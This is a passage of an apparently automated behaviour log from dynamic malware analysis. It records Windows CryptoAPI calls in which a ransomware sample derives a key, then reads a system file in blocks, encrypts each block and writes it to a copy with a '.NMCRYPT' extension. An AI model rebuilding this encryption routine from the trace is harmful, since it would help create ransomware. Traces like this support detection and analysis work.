dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.212] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.212] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0159.212] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.212] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad238) returned 1 [0159.212] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.212] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.212] wcslen (_String="\\\\?\\") returned 0x4 [0159.212] CryptDuplicateKey (in: hKey=0x9ad238, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad1b8) returned 1 [0159.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.213] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=7168) returned 1 [0159.213] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.213] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.215] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.215] GetLastError () returned 0x0 [0159.215] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.216] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.216] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.216] GetLastError () returned 0x0 [0159.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.216] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.216] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.216] GetLastError () returned 0x0 [0159.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.216] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.216] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.216] GetLastError () returned 0x0 [0159.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.216] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.216] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.216] GetLastError () returned 0x0 [0159.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.216] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.216] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.216] GetLastError () returned 0x0 [0159.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.217] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.217] GetLastError () returned 0x0 [0159.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.218] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.218] GetLastError () returned 0x0 [0159.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.218] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.218] GetLastError () returned 0x0 [0159.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.218] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.218] GetLastError () returned 0x0 [0159.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.218] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.218] GetLastError () returned 0x0 [0159.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.218] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.218] GetLastError () returned 0x0 [0159.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.218] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.219] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.219] GetLastError () returned 0x0 [0159.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, 